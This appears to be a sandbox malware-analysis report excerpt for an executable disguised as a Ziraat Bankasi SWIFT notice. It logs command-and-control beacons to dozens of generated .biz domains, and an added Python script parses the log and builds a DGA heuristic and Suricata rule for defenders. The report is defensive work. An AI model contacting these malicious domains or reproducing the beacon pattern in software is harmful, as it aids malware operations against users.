Source: global traffic HTTP traffic detected: POST /pucgkwypphrledk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ttplobtxqmiksba HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rmikhaggcn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /udiyekihhlktyw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hqwogpkl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uppfulbfwwgcmugi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ah HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /skptrowoy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /prrrrvo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gtfcajvqmbnpqs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vsgvgssokytrsgt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /brcmn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rbppubhsntef HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gxk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qrwvpmlh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sdd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mxrihtviqbtt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ef HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sroelgby HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /i HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jrqya HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sogowygirgwvide HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /akssysyiwejarq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yhkjs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cncvougpyxt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /eo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ooabmbiqikucit HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: esuzf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rghyclqgu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sde HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qpnczch.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nolqdemmkybmoyj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: brsua.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: global traffic HTTP traffic detected: POST /asw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dlynankz.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (50 identical entries)
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_004722EE
Source: global traffic HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Source: global traffic HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.fwiwk.biz
Source: global traffic HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: unknown HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
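The POST entries above share one User-Agent, one body size (Content-Length: 778) and a freshly generated consonant-heavy .biz domain per request, each contacted once; the GET requests to ww7./ww12. hosts with usid/utid parameters are consistent with a domain-parking redirect, which is what a DGA domain returns when nobody has registered it. The Python below is an added example and not part of the Joe Sandbox report: it parses the report's "HTTP traffic detected" lines, whose request headers are run together on one line, scores the POST set with simple DGA heuristics, and emits a Suricata rule keyed on the fixed User-Agent. The sample lines are rebuilt from the entries above; the vowel/consonant test, the thresholds in is_dga_beaconing and the Suricata SID are assumptions of the example.

```python
"""Parse the sandbox's 'HTTP traffic detected' entries, whose request headers are
run together on one line, and score the request set for DGA-style beaconing.
Added example; the heuristics, thresholds and the Suricata SID are assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional

# The one User-Agent seen on every request in the report.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


def post_line(host: str, path: str) -> str:
    """Rebuild one POST entry exactly as the report prints it (headers run together)."""
    return ("Source: global traffic HTTP traffic detected: POST %s HTTP/1.1"
            "Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: %s"
            "User-Agent: %sContent-Length: 778" % (path, host, UA))


# Sample input (constructed): hosts and paths copied from the entries above.
SAMPLE_LINES = [
    post_line("tbjrpv.biz", "/om"),
    post_line("deoci.biz", "/pucgkwypphrledk"),
    post_line("gytujflc.biz", "/ttplobtxqmiksba"),
    post_line("gytujflc.biz", "/rmikhaggcn"),
    post_line("qaynky.biz", "/udiyekihhlktyw"),
    post_line("bumxkqgxu.biz", "/hqwogpkl"),
    post_line("myups.biz", "/prrrrvo"),
    "Source: global traffic HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 "
    "HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: "
    + UA + "Host: ww12.przvgke.biz",
    "Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1",
]

HEADER_NAMES = ("Cache-Control", "Connection", "Pragma", "Host", "User-Agent",
                "Content-Length", "Content-Type", "Accept", "Accept-Encoding")
REQ_LINE = re.compile(r"\b(GET|POST|HEAD) (\S+) HTTP/1\.[01]")
# Zero-width split in front of each known header name: with the newlines gone,
# the header names themselves are the only reliable boundaries.
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))
VOWELS = set("aeiou")


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_line(line: str) -> Optional[Request]:
    """Return the request held by one report line, or None for DNS/UDP entries."""
    m = REQ_LINE.search(line)
    if not m:
        return None
    req = Request(m.group(1), m.group(2))
    for chunk in HEADER_SPLIT.split(line[m.end():]):
        if ": " in chunk:
            name, value = chunk.split(": ", 1)
            req.headers[name] = value.strip()
    return req


def registrable(host: str) -> str:
    """Last two labels, so ww12.przvgke.biz and przvgke.biz count as one domain."""
    return ".".join(host.lower().split(".")[-2:])


def looks_random(label: str) -> bool:
    """Crude DGA test (assumed): no vowels at all, or a run of four or more consonants."""
    if not any(c in VOWELS for c in label):
        return True
    run = longest = 0
    for c in label:
        run = run + 1 if c not in VOWELS else 0
        longest = max(longest, run)
    return longest >= 4


def summarize(lines) -> dict:
    """Features of the POST set that separate DGA beaconing from ordinary browsing."""
    posts = [r for r in map(parse_line, lines) if r and r.method == "POST"]
    domains = {registrable(r.headers.get("Host", "")) for r in posts}
    random_share = sum(looks_random(d.split(".")[0]) for d in domains) / max(len(domains), 1)
    return {
        "posts": len(posts),
        "distinct_domains": len(domains),
        "tlds": sorted({d.rsplit(".", 1)[-1] for d in domains}),
        "constant_body_length": len({r.headers.get("Content-Length") for r in posts}) == 1,
        "single_user_agent": len({r.headers.get("User-Agent") for r in posts}) == 1,
        "random_label_share": round(random_share, 2),
    }


def is_dga_beaconing(summary: dict, min_domains: int = 5) -> bool:
    """Assumed thresholds: many one-shot domains under a single TLD, a fixed body
    size and User-Agent, and mostly consonant-heavy labels."""
    return (summary["distinct_domains"] >= min_domains
            and len(summary["tlds"]) == 1
            and summary["constant_body_length"]
            and summary["single_user_agent"]
            and summary["random_label_share"] >= 0.5)


def suricata_rule(lines, sid: int = 1000001) -> str:
    """Rule keyed on the fixed User-Agent tail and the TLD; the sid is a placeholder."""
    tld = summarize(lines)["tlds"][0]
    first = next(r for r in map(parse_line, lines) if r and r.method == "POST")
    ua_tail = first.headers["User-Agent"].split("Safari/537.36 ", 1)[-1]
    return ('alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible DGA beacon, '
            'fixed UA POST to .%s"; flow:established,to_server; http.method; content:"POST"; '
            'http.user_agent; content:"%s"; http.host; content:".%s"; endswith; '
            'classtype:trojan-activity; sid:%d; rev:1;)' % (tld, ua_tail, tld, sid))


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    print(s, "-> DGA beaconing" if is_dga_beaconing(s) else "-> not flagged")
    print(suricata_rule(SAMPLE_LINES))
```

Running the file prints the feature summary and the rule. The vowel/consonant test is deliberately crude and will misfire on real words; the stronger signal is the combination of a fixed body size, a fixed User-Agent and one request per domain, which is why is_dga_beaconing requires all of them together.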
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 21 Mar 2025 14:10:24 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 21 Mar 2025 14:10:24 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
